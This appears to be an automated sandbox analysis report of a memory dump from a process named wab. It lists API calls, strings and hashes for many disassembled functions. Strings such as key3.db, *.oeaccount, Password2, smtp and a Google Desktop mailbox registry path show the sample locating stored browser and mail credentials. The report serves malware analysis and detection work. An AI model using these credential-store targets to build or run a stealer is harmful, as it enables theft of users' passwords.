                                                                                                                • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: winWrite1$winWrite2
                                                                                                                • API String ID: 438689982-3457389245
                                                                                                                • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: winRead
                                                                                                                • API String ID: 1297977491-2759563040
                                                                                                                • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                                • memset.MSVCRT ref: 0040AB9C
                                                                                                                  • Part of subcall function 00411004: memcpy.MSVCRT ref: 00411072
                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 3337535707-2769808009
                                                                                                                • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004090C2
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2374668499-0
                                                                                                                • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040AD5B
                                                                                                                • memset.MSVCRT ref: 0040AD71
                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT ref: 0040A4EB
                                                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                Strings
                                                                                                                • <%s>, xrefs: 0040ADA2
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3699762281-1998499579
                                                                                                                • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                                                                                                                  • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2775283111-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                • API String ID: 885266447-2471937615
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                                                                                                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                • String ID: Ul@$key3.db
                                                                                                                • API String ID: 1968906679-1563549157
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strcmpi$_mbscpy
                                                                                                                • String ID: smtp
                                                                                                                • API String ID: 2625860049-60245459
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                • memset.MSVCRT ref: 00408258
                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                Strings
                                                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$EnumOpenmemset
                                                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                • API String ID: 2255314230-2212045309
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                                                • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                • String ID: S_@$l
                                                                                                                • API String ID: 3436799508-4018740455
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004092C0
                                                                                                                • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                • _mbscpy.MSVCRT ref: 004092FC
                                                                                                                Strings
                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                • API String ID: 408644273-3424043681
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy
                                                                                                                • String ID: C^@$X$ini
                                                                                                                • API String ID: 714388716-917056472
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                • String ID: MS Sans Serif
                                                                                                                • API String ID: 3492281209-168460110
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 275601554-2167791130
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$_mbscat
                                                                                                                • String ID: 3CD
                                                                                                                • API String ID: 3951308622-1938365332
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscat$_mbscpy
                                                                                                                • String ID: Password2
                                                                                                                • API String ID: 2600922555-1856559283
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                • API String ID: 2574300362-543337301
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: rows deleted
                                                                                                                • API String ID: 2221118986-571615504
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 3384217055-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 368790112-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 368790112-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __allrem.LIBCMT ref: 00425850
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                • __allrem.LIBCMT ref: 00425933
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1992179935-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                • API String ID: 2221118986-515162456
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                • memset.MSVCRT ref: 004026AD
                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1593657333-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040C922
                                                                                                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3798638045-0
                                                                                                                Uniqueness

